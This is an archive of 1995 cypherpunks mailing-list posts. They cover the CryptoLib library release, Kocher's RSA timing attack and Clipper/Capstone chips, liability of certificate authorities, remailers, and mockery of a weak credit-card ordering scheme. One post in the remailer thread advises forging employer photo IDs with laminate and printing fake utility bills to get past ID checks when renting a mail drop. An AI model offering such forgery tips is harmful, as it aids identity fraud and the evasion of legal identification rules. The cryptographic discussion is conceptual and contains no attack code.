	-- Antonin Artaud		   gbroiles@darkwing.uoregon.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 14 Dec 1995 10:59:02 +0800
To: cypherpunks@toad.com
Subject: CryptoLib 1.0 now available
Message-ID: <199512140032.TAA27224@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note! This is posted for Jack Lacy; please direct responses to him
at cryptolib@research.att.com.  -matt]

Announcing CryptoLib - Release 1.0		12/13/95
   Jack Lacy, AT&T Bell Labs

CryptoLib is a portable and efficient library of primitives
for building cryptographic applications.  It runs under most versions
of Unix as well as DOS, Windows and Windows-NT (and 95).

We are pleased to make CryptoLib source code available without charge
to researchers and developers in the US and Canada.  (Because of export
restrictions on cryptographic software, we are only able to make the
software available within the US and Canada to US and Canadian citizens
and US permanent residents.)

CryptoLib is intended for research and experimental use, and is
distributed without warranty or support.  In particular, please
note the following license conditions:

 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software may be subject to export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

The attached describes the library and some timing results.

To obtain source code send electronic mail to:

	cryptolib@research.att.com

with a statement of the following form:

	"I am a U.S. or Canadian citizen or a legal permanent resident of the
	U.S. and am aware that some parts of CryptoLib may be restricted under
	United States export regulations.  I have read and understand the
	CryptoLib license."

	Name:
	Location:
	E-mail:
	Are you licensed to use the RSA patent?
	   If yes, give name of licensed organization:
		
===============================================================================

CryptoLib includes the following:

	arbitrary length bignums.

	bigmath package:
		bigAdd, bigSubtract, bigMultiply, bgiDivide,
		bigLeftShift, bigRightShift,
		bigAnd, bigOr, bigXor, bigCopy,
		Euclid's extended GCD,
		modular reduction and exponentiation

	crypto primitives
		DES and 3DES + modes
		Diffie-Hellman
		DSA (Signing and verification roughly equally efficient)
		El Gamal
		Rabin's scheme
		Random Number generation (PSEUDO and TRUE)
		MD[2,4,5]
		Prime generation
		RSA (provided only if you convince me that you have a license)
		SHA
		truerand (For Unix, NT and 95)
		quantization (Defense against Kocher's timing attack)
		quantized RSA, DSA and El Gamal private key operations.
		
	support functions
		asn1.c
		ioutils.c
		netIface.c

Some timing information:

All times assume 32X32 bit assembly of multiplication primitives.

bigPow times (a^b mod c with a,b,c the same length)

		512 bits	1024 bits
		--------	---------
bigPow		0.12s		0.72s		Sparc II Brickell bigpow
		0.43s		3.0s		Sparc II with asm (gcc)
		0.12s		0.78s		Sparc 10 with asm
		0.03s		0.17s		Sparc 10 with asm (Brickell)
		0.084s		0.45s		SGI Indigo (150MHz)
		0.109s		0.75s		100 MHz Pentium (gcc under DOS)

Strong Prime Generation -- ProbTestAttempts = 5
100 primes generated in each test.  Times below are:
(total test time)/100 = avg. time per prime generated.
Using Gordon's strong prime algorithm.

    256		512	1024	Machine
    ---		---	----	-------
    2.8s	24.0s	5.11m	Sparc II 
    .45s	2.7s	77s	100 MHz pentium
	


	RSA Times (64 bit public exponent, message encrypted is full length)
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
encrypt		30ms	50ms	80ms		sparc II
decrypt		160ms	480ms	930ms

encrypt		15ms	33ms	56ms		100 MHz Pentium (Under NT)
decrypt		38ms	104ms	214ms


	DSA Times
	---------

		512	768	1024 bits	machine
		---	---	---------	-------
sign		99ms	166ms	216ms		sparc II (Brickell speedup)
verify		156ms	316ms	416ms

sign		21ms	38ms	49ms		100 MHz Pentium (Under NT)
verify		27ms	43ms	71ms





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Thu, 14 Dec 1995 12:50:13 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512132111.AA18490@bilbo.suite.com>
Message-ID: <9512140210.AA12418@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: jim@bilbo.suite.com (Jim Miller)
>Date: Wed, 13 Dec 95 15:10:25 -0600

>Could this timing attack be used to obtain the various keys used by  
>Clipper devices?

Jim,

Without having the details of the algorithm, I suspect the answer is
'remotely possible, at best'.

However, to extend what I suspect you were getting at:

It would be very interesting to determine if the NSA knew about this
crypto-design problem and put effort into making Clipper chips resistant
to this timing based attack.  Without access to internal documents,
I suspect this would be hard to determine.  We could learn something
about the NSA by studying the Clipper chip (or the follow-on PCMCIA
product containing SKIPJACK, Capstone).

If it could be shown that Clipper chips require a different amount of
time/current to encode/decode traffic, then we could conclude one of
the following:

(A1) The NSA knew about the problem, expected to be able to use the
     behavior as an illegal backdoor and thus did nothing to close it.
(A2) The NSA knew about the problem, expected that no one (including
     themselves) would be able to exploit the behavior, and thus did
     nothing to close it.
(A3) The NSA didn't know about the problem.

Conclusions A1 and A3 would tend to make the NSA look bad.  A2
would be fine, if the NSA expectation was found to be valid.  To
restate, without internal documents, outsiders would have little
ability to determine which conclusion to draw even if differences
in behavior were detected.

If it could be shown that Clipper chips require a fixed amount
of time/current to encode/decode traffic, then we could conclude
one of the following:

(B1) The NSA knew about the issue and compensated for it.
(B2) The NSA didn't know about the issue and got lucky.

I discount B2 as a valid option.  Actually, if the answer was B1,
my respect for the NSA would creep up a notch. :-)

Regards,
Loren

- -- 
Loren J. Rittle (rittle@comm.mot.com)	PGP KeyIDs: 1024/B98B3249 2048/ADCE34A5
Systems Technology Research (IL02/2240)	FP1024:6810D8AB3029874DD7065BC52067EAFD
Motorola, Inc.				FP2048:FDC0292446937F2A240BC07D42763672
(708) 576-7794				Call for verification of fingerprints.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM+HTf8de8m5izJJAQGWJwP8CUJIagN5cyZhRc9Qxq4+u4d/1H7wfAzi
OKa+m4XlfEsCKxF9x6vnYXcC2jGKpU43RbCVsLN/FLJjptWuBczXzPMdS1Uu0nPU
yVWse7eVx0Jl0dbTpUxm0Z966G4cwmnX0Npq6BnVFlp7mNFJGZv157K17vsHwvYB
apf4IwtPqdI=
=CDP6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Fri, 15 Dec 1995 01:10:11 +0800
To: rittle@comm.mot.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <9512140222.AA23036@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain




> Without having the details of the algorithm, I suspect
> the answer is 'remotely possible, at best'.
> 

> However, to extend what I suspect you were getting at:
> 

> It would be very interesting to determine if the NSA knew
> about this crypto-design problem...
> 


That was indeed what I was wondering.  I expect we wont have to wait too  
long before we hear whether Clipper chips require the same or a different  
amount of time to encrypt/decrypt.  Should be interesting.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 15 Dec 1995 09:02:27 +0800
To: hfinney@shell.portal.com
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <01HYRJSUSFLS8Y4Z3G@mbcl.rutgers.edu>
Message-ID: <199512140217.VAA11922@homeport.org>
MIME-Version: 1.0
Content-Type: text


::
Encrypted: PGP

::
Request-Remailing-To: hroller@c2.org

##
Subject: Re: e-mail forwarding, for-pay remailers

::
Encrypted: PGP

::
Request-Remailing-To: homer@rahul.net

##
Subject: Re: e-mail forwarding, for-pay remailers

::
Encrypted: PGP

::
Request-Remailing-To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)

##
Subject: Re: e-mail forwarding, for-pay remailers

Photo IDs are easy to make for your employer, the law offices of Dewy,
Lye, and Howe.  Stick on laminate from an art supply store.  Good
thing to have.  Don't forget the SSN style employee id number.

Those forms they send to a post office?  They don't check for the real
address. MBE just needs 'proof' that its yours.  Again, your local
laser printer and an electricity bill do just fine.  They don't need
to keep the original; so the evidence is a bad photocopy.  The trick
is to make all this easy to accept & not make a fuss about the
information.  Meekly hand it over.



>> netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
>> or forwarding for people; they let you sign up for a trial month for free.
>> They ask for name/address/phone (which could easily be a Mailboxes Etc
>> address and a voicemail from Mailboxes Etc or whatever) and accept payment
>> by check or credit card. They'll store incoming email or forward it to
>> another account. They'll do header rewriting (similar to the anonymous
>> remailers) so that outgoing mail looks like it came from this address.

>        There's one problem with this in regards to the "no necessary
>connection," and that 's the governmental requirement for mail
>forwarding. MBE and any legal other one will want to see at least two
>forms of ID including one photo, and have a form that they fill out
>using that and send to the local post office. Anyone have a way around
>this problem?
>        -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 14 Dec 1995 14:40:23 +0800
To: Matthias Schunter <dklur@dttus.com>
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <199512140600.WAA26003@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 AM 12/12/95 +0100, Matthias Schunter wrote:
> We will soon publish our full protocol and architecture specifications.
> A short 50-page summary is already available (PostScript). 

While I appreciate all the good work you guys are doing, it is often
said that when people wish to nominally make things public without 
the risk of too many people paying attention, they make a postscript 
file, and when they really want the world to know, they make a bunch
of html files.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 14 Dec 1995 06:33:35 +0800
To: cypherpunks@toad.com
Subject: Re: PGP status in russia
In-Reply-To: <PasPossible-1012951419480001@ppp073-sf2.sirius.com>
Message-ID: <Pine.HPP.3.91.951213214157.13017A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, JustMe wrote:

> does anybody know the legal status
> of using encrypted email in russia?

Probably forbidden without a government license.
See: http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Mats






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Thu, 14 Dec 1995 17:43:36 +0800
To: mab@research.att.com (Matt Blaze)
Subject: Re: CryptoLib 1.0 now available
In-Reply-To: <199512140032.TAA27224@nsa.tempo.att.com>
Message-ID: <199512140448.VAA18190@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> CryptoLib includes the following:
[...]
> 		quantization (Defense against Kocher's timing attack)
> 		quantized RSA, DSA and El Gamal private key operations.


Maybe this is an incorrect conclusion, but here seems to be a _second_ group
who knew about Kocher's timing attack before Kocher did. What on earth
would ECash or ATT have to gain by keeping such knowledge a secret? 

                                   -- Will






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Date: Fri, 15 Dec 1995 11:21:52 +0800
To: cypherpunks@toad.com
Subject: [NOISE] The Enquirer
Message-ID: <199512140350.VAA20825@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


The Podunk, Idaho Cypherpunks chapter held its annual meeting this past
weekend at Buffalo Jim's Bar and Grill, where the sole attending member,
Frank Semalo, was promptly arrested by local authorities for wearing a
"munitions" T-shirt.  He was released the next morning when the NSA confirmed
that the T-shirt was probably legal to wear in Podunk as long as Mr. Semalo
did not enter the local Mexican or Chinese restaurants.

By a 17-13 vote today, the Remailer Operators Association decided to start
sending out ALL anonymous remailer e-mail with a header entry of:
From: Alice de 'nonymous.

Surgeons at Netscape Communications successfully removed Jim Clark's foot
from his mouth today.  The foot was reported to be doing fine, but a little
wrinkled and in need of a good pedicure.  Company spokespersons reported
that the reason the foot was in there so long was that Mr. Clark was in
Washington, D.C. discussing the future of government regulation of the 
Internet with 'top government officials', and could not return to Mountain
View for surgery until recently.  In related medical news, proctologists at 
Bethesda Naval Hospital reported that Louis Freeh's head was still
firmly stuck.

Spam of the month:  Friend

The International Society for the Prevention of Cruelty to Animals announced
today that it was investigating the Blue Wave Corporation to determine if
any of the snakes were harmed or killed in the production of its signature
product, SimplySafe.

Just a coincidence?  Immediately after Tim May announces that he will not
be discussing Netscape anymore because he's making some financial plays on
the stock (hinting that he's probably shorting it), it drops 30 points?  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 16 Dec 1995 02:16:23 +0800
To: bryce@colorado.edu
Subject: Re: Web O Trust, active attacks against same, etc.  AGAIN.  (was: Usability of Cryptography (was Re: More FUD from First Virtual) )
Message-ID: <199512140616.WAA28005@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:39 PM 12/13/95 -0700, Bryce wrote:
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
> An entity calling itself "James A. Donald" <jamesd@echeque.com> 
>allegedly wrote:
>>
>> Web of trust is a mess because it attempts to link keys to 
>> physical people, which in general cannot be done.
>                   *******************************
>
>
>Do you wish to substantiate this rather brazen assertion?  
>I am very sure that PGP public key 0xCC56B2E9 belongs to my
>housemate Sebastian Kuzminsky <kuzminsk@colorado.edu>.  Is
>there some reason why I should doubt this belief?

No, but there is some reason you should gain familiarity with 
the english language

If I had intended to say "generally cannot be done"  I would have
said "generally cannot be done" instead of saying "in general cannot 
be done"



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sat, 16 Dec 1995 02:23:01 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] The Enquirer
Message-ID: <9512140621.AA27244@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



Now, THAT's what I call "The News Update".
This is the kind of encapsulated [NOISE] we could all stand to hear!
ha-ha-ha

  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Thu, 14 Dec 1995 14:15:15 +0800
To: herbs@connobj.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <9512140458.AA25132@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



> >If it could be shown that Clipper chips require a fixed amount
> >of time/current to encode/decode traffic, then we could conclude
> >one of the following:
> >
> >(B1) The NSA knew about the issue and compensated for it.
> 

> Remember those carefully-chosen S-box numbers for DES
> and how, years later, how they just happened to turn out to
> be optimal for defending against the newly-discovered
> (in non-military circles) technique of differential
> cryptanalysis... :-) 

> 


That brings up an issue I occasionally think about...At what point does  
NSA's secrecy become more of a liability than an asset.  Should the NSA  
reveal flaws in crypto-systems in wide use here in the US to protect US  
companies and individuals from attack or should they remain quite so they  
can exploit them in the interests of national security?

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 14 Dec 1995 16:25:33 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <199512140742.XAA06927@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>E. Allen Smith writes:
>>         There's one problem with this in regards to the "no necessary
>>  connection," and that 's the governmental requirement for mail
>>  forwarding. MBE and any legal other one will want to see at least
>>  two forms of ID including one photo, and have a form that they fill
>>  out using that and send to the local post office. Anyone have a
>>  way around this problem?

There are two different sets of relevant rules in the US - Post Office and
state.
The PO's primary interest is making sure you don't mind if they don't
forward your mail once you stop using the Commercial Mail Receiving Agent
(CMRA) and secondarily that you aren't committing fraud by using the mailbox,
sending people change-of-address notices, ripping off your creditors, and
skipping town.  California has a hopelessly dishonest law that just went
into effect in 1995, which pretends to be designed to protect consumers from
fraud by the 7 million small businesses in CA that uses mailboxes,
and actually requires that _anybody_, business or not, who wants to rent
a mailbox must fill out the Post Office form and also appoint the PO or CMRA
as their agent for service of process and give them up-to-date True Addresses.
The PO, meanwhile, "usually wants" a California Driver's License plus another ID
to rent a box from them.  (I didn't have such a thing when I last rented a box,
and the PO hassled my mailbox company into asking for one when the new law
came out.)  After many attempts at calling the PO to get anybody
who knows the _official_ rules for what ID is required, I found a PO lawyer 
who told me the rules are in the "Domestic Mail Manual", which any
Postmaster has,
so my next step is to look up one of those before I next get a mailbox.

So maybe a random photo ID will work, such as your FooBar Consulting
Employee ID,
and maybe it won't, depending on what state you live in and how clueless
your local Post Office bureaucrats are.

At 05:29 PM 12/13/95 -0600, Andrew Loewenstern 
<andrew_loewenstern@il.us.swissbank.com> wrote:

> I believe C2.org already offers non-dialup access accounts, paid for  
>with ECash, that do not require a valid snail-address or phone-number.  
>I am sure that there will be many more to come.

I suspect Sameer would be happy to open an account paid in advance in
small unmarked bills.  AOL probably wouldn't.  Fortunately, the government
hasn't really caught on to the importance of email, so they aren't requiring
that email providers know where you really live.  I predict 1997 for that.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Thu, 14 Dec 1995 13:56:12 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <199512140443.XAA19961@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 20:10 12.13.1995 CST, Loren James Rittle wrote:
>If it could be shown that Clipper chips require a fixed amount
>of time/current to encode/decode traffic, then we could conclude
>one of the following:
>
>(B1) The NSA knew about the issue and compensated for it.
>(B2) The NSA didn't know about the issue and got lucky.
>
>I discount B2 as a valid option.  Actually, if the answer was B1,
>my respect for the NSA would creep up a notch. :-)

Remember those carefully-chosen S-box numbers for DES and how, years later,
how they just happened to turn out to be optimal for defending against the
newly-discovered (in non-military circles) technique of differential
cryptanalysis... :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 14 Dec 1995 15:14:54 +0800
To: cypherpunks@toad.com
Subject: 3rd party beneficiaries and certificates
Message-ID: <199512140518.AAA30556@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear cypherpunks:

Professor Froomkin posted the following interesting questions to
cyberia-L, and gave me permission to repost them here. Please
direct any private replies to him <froomkin@law.miami.edu>. My
apologies to those of you who hang out in both dens for having
to see the same message twice.
JMR
[Forwarded message follows]

I've been trying to work something out.  

(I've written these questions in the form of an exam because it's that 
time of year.  In fact, I'm struggling with these in a paper I'm working on.)

Carol runs a certificate authority (CA).  She sells a certificate to Alice
binding Alice's public key to her name and email address.  In version (A)
of the contract Carol posts the certificate on her web site.  In version
(B) of the contract Alice gets a floppy disk with the certificate.

The certificate is in error (due to Alice's fraudulent or negligent 
misrepresentation to Carol).  Bob relies on it to his detriment in a 
transaction with Alice.  Assume Bob can show but for causation of his loss.

Bob now wishes to sue Carol for negligent misrepresentation.  
He has, I think, three possible theories.

1) UCC.  This turns on whether a certificate is a "good" or a "service". 
{Assume the answer is "service" for the rest of this hypo}

2) Contract.  Bob has to show that he's an intended beneficiary under the 
restatement 2d test.  This seems to be almost a theological question.  Is 
the purpose of the certificate to give Alice a tool to induce Bob to 
transact, or to give Bob a benefit without which he will not transact?

3 )Tort of negligent misrepresentation.  To make this especially exciting, 
let's assume all the action is in NY where the shadow of Cardozo still 
looms.  NY retains a strong privity rule: You can only recover for a 
negligent misrepresentation if you are in privity of contract with the 
speaker.

Question 1: If Bob is an intended beneficiary, is he in privity with 
Carol? (I think the answer is "yes").

Question 2: Are Bob's rights, or his status as an intended beneficiary, 
affected by whether the contract is form A or form B above?  The classic 
cases, like Ultramares have the accountant's report spread around by the 
client.  Suppose the accountant in Ultramares instead publishes the 
report on the Web -- what result?

OK, now we change the facts.  We're not in NY anymore, we are in a state 
that follows the restatement 2d rule in sec. 552.  

Question 3: Is Bob within the class of forseeable users entitled to
recover for the tort of negligent misrepresentation as these terms are
used in the restatement?

Question 4: Is the certificate a good or a service? (I say it's a 
service, mostly, unless it makes no representations at all about its 
quality.)

Extra credit: Look up 

http://www.verisign.com/netscape/legal.html

and find the disclaimers in THE BIG TYPE.  Do you know of any court that 
would enforce these?   On a "good"?  On a "service" provider?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.
[End forwarded message]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM+jfW1lp8bpvW01AQFe7QP/dlWbaICoo7lgtTZVsZvd4dvKx3LawfU9
FH8e78Tpo5ICgfKwBNNj6MlBgG7sxAu2LTqMHTTHkcuHksdNTZImJlnNs64phnK0
zBF7IqcT1BOBijWiFWdni+i62NGzppj0BKnyebmFivUbwmi4QGN3gLMxkvD94eWI
TU7/+tFB/iI=
=8JOv
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 15 Dec 1995 02:26:49 +0800
To: "W. Kinney" <kinney@bogart.colorado.edu>
Subject: Re: CryptoLib 1.0 now available
In-Reply-To: <199512140448.VAA18190@bogart.Colorado.EDU>
Message-ID: <199512140526.AAA27695@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>> CryptoLib includes the following:
>[...]
>> 		quantization (Defense against Kocher's timing attack)
>> 		quantized RSA, DSA and El Gamal private key operations.
>
>
>Maybe this is an incorrect conclusion, but here seems to be a _second_ group
>who knew about Kocher's timing attack before Kocher did. What on earth
>would ECash or ATT have to gain by keeping such knowledge a secret? 
>
>                                   -- Will
>
>

Although it's very tempting to come up with an elaborate confession to
being part of the big conspiracy of the powers-that-be to suppress our
most brilliant cryptologic discoveries, I must admit that in fact you have
reached an incorrect conclusion.  I added the quantization stuff to
CryptoLib over the weekend right after I read Kocher's paper.  I posted the
routines to cypherpunks and sci.crypt yesterday.  You must have missed it.

Also, it should be pointed out that the idea that timing information
can leak information (like bit density) about keys has been well-known
for a long time.  I understand that NSA cryptosystems have long required
fixed response time for some (but not all...) cryptographic primitives in
comsec equipment.  But understanding that timing information might be
a threat in principle is not the same as understanding how to exploit it
in practice.

Kocher's observations are very, very surprising.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 14 Dec 1995 14:23:12 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512140222.AA23036@bilbo.suite.com>
Message-ID: <199512140531.AAA23535@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> That was indeed what I was wondering.  I expect we wont have to wait too  
> long before we hear whether Clipper chips require the same or a different  
> amount of time to encrypt/decrypt.  Should be interesting.
>
Clipper chips require fixed time to do a codebook cipher operation (exactly
64 clock ticks).  It's in the chip spec.

Capstone chips, on the other hand (as embodied in Tessera/Fortezza) have
public-key operations (DSA and a classified key exchange algorithm called
KEA that appears based on its interface to be El Gamal-like).  The cards
aren't supposed to reveal the secrets stored on them, ever.  There does
appear to be some variability in those functions, however.  I've not yet
reached any firm conclusions, however.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darrell Fuhriman <darrell@teleport.com>
Date: Thu, 14 Dec 1995 23:42:59 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: And the standard continues to lower...
In-Reply-To: <199512140038.BAA02939@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951214010119.19728A-100000@claudia.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


> >http://www.bluewaterp.com/~bcrissey/

Oh no.. It's not... 

# nslookup www.bluewaterp.com
Server:  sandra.teleport.com
Address:  192.108.254.11

Name:    www.teleport.com
Addresses:  192.108.254.16, 192.108.254.17, 192.108.254.18
Aliases:  www.bluewaterp.com

Ack!  it is!! Oh no..

> The scheme is to send 4 digits of the credit card at a time. The
> "explanation" follows.

I've had a little chat with the web people downstairs about this.  I 
don't know what they were thinking when they have this guy permission to 
run this..

I thought about sticking a packet sniffer on the network, and sending him 
all his "secure" transactions.

I'm going to look over the code for obvious problems (heh heh that's an
understatement), but a cursory glance leads me to think it's an entry in
the Annual Poor Code Formatting contest. 

Ugh.. I'm so embarrased.

Darrell Fuhriman
Teleport System Administration





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Thu, 14 Dec 1995 23:41:17 +0800
To: cypherpunks@toad.com
Subject: Kocher's RSA attack
Message-ID: <rschlafly3480927310>
MIME-Version: 1.0
Content-Type: text/plain



I read Kocher's paper, but I question its applicability.  One of his
premises is that the time of a modular multiplication varies with
the data.  I've checked my code for modular multiplication, and
the clock cycles to execute don't depend on the data at all.  The
same instructions get executed, and assuming the processor has a
hardware multiply, they take the same time.

When I timed the modular multiplication, I was able to detect some
slight variation, but I attribute this to cache misses, as the variance
with the same data was the same as the variance with different data.

Apparently RSAREF has modular multiplies which vary significantly
with the data, but I maintain this is not necessary.

A good test case for his analysis might be to pull a secret key
from a smart card.  If, say, the Capstone chip modular multiplication
has some timing anomalies, this might be a good way to defeat the
Fortezza card.

Roger Schlafly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 14 Dec 1995 11:00:15 +0800
To: cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <199512140038.BAA02939@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>If the misuse of "One Time Pad" wasn't enough for ya, check out this ad
that
>I was e-mailed.
>
>And the chair of a CS department, no less.
>
>- ------- start of forwarded message (RFC 934 encapsulation) -------
>Subject: Secure No-overhead Online Order System for Publishers
>Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST)
>
>A secure no-overhead online title-ordering system is now available. It may
>be viewed in operation at the home page for Blue Water Publishing, a
>publisher, software developer and distribution company, at
>http://www.bluewaterp.com/~bcrissey/
>or from the online bookstore area of ISCNI, the Institute for the Study of
>Contact with Non-Human Intelligence at
>http://www.iscni.com
>
>Blue Water's innovative online ordering system is called SimplySafe. It is
>a needle-in-the-haystack approach to online security.  It requires no
>encryption or secure servers, yet the probability that a dedicated hacker
>scanning 100 internet messages a second will intercept a usable credit
>card number sent via SimplySafe is less than the probability of picking
>our Sun out of the Milky Way.  That is less than 1 in 200 billion.  Safe
>enough for most folks.  There are easier ways for a hacker to pick up
>credit card numbers than to waste time with SimplySafe transactions.  Try
>it out!
>
>SimplySafe currently supports secure online orders from Blue Water
>Publishing, Wild Flower Press, Swan-Raven & Co., and ISCNI.
>Direct inquiries to
>SimpleSafe@aol.com
>
>***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
>(503)-434-2426 brianc@linfield.edu
>Professionals built the Titanic, amateurs built the Ark...

The scheme is to send 4 digits of the credit card at a time. The
"explanation" follows.

>In order to proceed with your SimplySafe(r) encryption of your credit card
>number, please enter the SECOND set of (4) digits of your credit card
number:
>
>In the 41 seconds since you sent your first packet of four digits,
>approximately 2869959 packets of information have passed across the
internet.
>Assuming that a hacker can scan 100 packets of information per second for
>credit card information, there is 1 chance in 699 that he has scanned your
>first packet of digits.
>He is unlikely to have found anything useful.

Sigh.

Wilhelm Busch

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMM9w94iUi5SQtQ3tAQENnAf6A2SdN+AZGryzJ/eCE/fj+YO71ngQXk8A
2tAomwUqAPmrCll+ucnDc/knsct2VYo4I9b+j84Ah+Gzz6rAu3LKY+joBrgDBmBY
j79BOxik6tz9GCdBYDxTQ1BJpwbDAxaQHpNJYgEFryB59yxo4gi9xZbKZnnQv571
uQfuk1rAJbI+ESJK1Wlw8YrT+q8PoW8m5Y1qjBhxczRNaYAENsrVqHsz8L8bEBkW
WEfi6wIQpRkB6Fo9hH2HAVamvUwJvDtPgll6U1zBgh/zEs1Jyot3XLV5UHrdL7oM
6FRPD1LW/cWGjUv2YNyv6a3vDFz9LdcCk9eX+gekODzaE+fgeQWI3g==
=2n1S
